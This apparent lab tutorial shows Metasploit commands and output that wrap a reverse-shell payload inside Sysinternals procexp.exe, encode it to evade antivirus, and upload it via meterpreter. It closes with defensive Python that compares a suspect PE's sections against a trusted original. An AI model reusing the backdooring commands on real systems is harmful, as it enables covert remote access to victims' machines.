Metasploit custom executable template

Download Sysinternals from the web, extract it to get procexp.exe, copy it to BT5, and then generate pe_backdoor.exe:

root@bt:/opt/metasploit/msf3# mkdir work
root@bt:/opt/metasploit/msf3# cp ~/procexp.exe work/
root@bt:/opt/metasploit/msf3# ls work/
procexp.exe
root@bt:/opt/metasploit/msf3# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)


real    0m40.713s
user    0m24.734s
sys     0m15.513s
root@bt:/opt/metasploit/msf3# ls
armitage  documentation  HACKING  msfbinscan  msfd        msfgui       msfpescan  msfrpcd    pe_backdoor.exe  scripts  THIRD-PARTY.md
COPYING   external       lib      msfcli      msfelfscan  msfmachscan  msfrop     msfupdate  plugins          spec     tools
data      Gemfile        modules  msfconsole  msfencode   msfpayload   msfrpc     msfvenom   README.md        test     work
root@bt:/opt/metasploit/msf3# file pe_backdoor.exe 
pe_backdoor.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
root@bt:/opt/metasploit/msf3# mv pe_backdoor.exe ~/


Upload to XP:

meterpreter > upload pe_backdoor.exe
[*] uploading  : pe_backdoor.exe -> pe_backdoor.exe
[*] uploaded   : pe_backdoor.exe -> pe_backdoor.exe
meterpreter >

The antivirus software reports a threat. After renaming the file to hello.exe, it still reports a threat.
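
Renaming a file does not change its contents, so a defender can compare a suspect copy of a well-known tool against a trusted original. The following is an added example, not part of the original post: it diffs the entry point and the per-section SHA-256 hashes of two PE files. The function names (parse_pe, diff_pe, make_sample) are hypothetical, and the two inputs are constructed in memory rather than taken from procexp.exe.

```python
import hashlib
import struct

def parse_pe(buf):
    """Return (entry point RVA, {section name: SHA-256 of its raw data})."""
    (pe_off,) = struct.unpack_from("<I", buf, 0x3C)          # e_lfanew
    if buf[:2] != b"MZ" or buf[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = pe_off + 4
    (nsect,) = struct.unpack_from("<H", buf, coff + 2)       # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", buf, coff + 16)   # SizeOfOptionalHeader
    opt = coff + 20
    (entry,) = struct.unpack_from("<I", buf, opt + 16)       # AddressOfEntryPoint
    sections = {}
    for i in range(nsect):
        off = opt + opt_size + 40 * i                        # 40-byte section headers
        name = buf[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", buf, off + 16)
        sections[name] = hashlib.sha256(buf[raw_ptr:raw_ptr + raw_size]).hexdigest()
    return entry, sections

def diff_pe(reference, suspect):
    """List how a suspect copy differs from a trusted original."""
    ref_entry, ref_secs = parse_pe(reference)
    sus_entry, sus_secs = parse_pe(suspect)
    findings = []
    if ref_entry != sus_entry:
        findings.append("entry point %#x -> %#x" % (ref_entry, sus_entry))
    for name in sorted(set(ref_secs) | set(sus_secs)):
        if ref_secs.get(name) != sus_secs.get(name):
            findings.append("section %s differs" % name)
    return findings

def make_sample(entry, text, data):
    """Constructed minimal PE32 image: only the fields parse_pe reads are set."""
    def section(name, rva, body, ptr):
        return struct.pack("<8sIIII", name, len(body), rva, len(body), ptr).ljust(40, b"\0")
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, entry).ljust(224, b"\0")
    ptr = 64 + 4 + 20 + 224 + 2 * 40                         # first byte after headers
    table = section(b".text", 0x1000, text, ptr) + section(b".data", 0x2000, data, ptr + len(text))
    return dos + b"PE\0\0" + coff + opt + table + text + data

# Constructed inputs standing in for a trusted original and a modified copy.
ORIGINAL = make_sample(0x1000, b"\x90" * 32, b"config")
MODIFIED = make_sample(0x1010, b"\x90" * 16 + b"\xcc" * 16, b"config")
if __name__ == "__main__":
    print("\n".join(diff_pe(ORIGINAL, MODIFIED)) or "no differences")
```

To check real files, read the vendor original and the suspect copy as bytes and pass both to diff_pe.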
